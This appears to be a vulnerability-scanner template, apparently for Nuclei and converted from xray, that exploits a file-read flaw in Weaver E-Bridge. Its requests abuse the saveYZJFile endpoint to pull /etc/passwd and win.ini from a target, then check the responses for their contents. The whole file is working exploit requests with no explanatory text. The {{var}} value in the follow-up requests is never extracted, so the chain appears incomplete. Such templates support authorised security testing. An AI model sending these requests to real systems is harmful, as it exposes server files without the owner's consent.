id: poc-yaml-weaver-ebridge-file-read

info:
  name: poc-yaml-weaver-ebridge-file-read
  author: mvhz81
  severity: high
  tags: xray-converted,lfi,ct-159019
  reference:
    - https://mrxn.net/Infiltration/323.html

http:
  - raw:
      - |
        GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "id"
  - raw:
      - |
        GET /file/fileNoLogin/{{var}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"
  - raw:
      - |
        GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "id"
  - raw:
      - |
        GET /file/fileNoLogin/{{var}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "for 16-bit app support"
          - "[extensions]"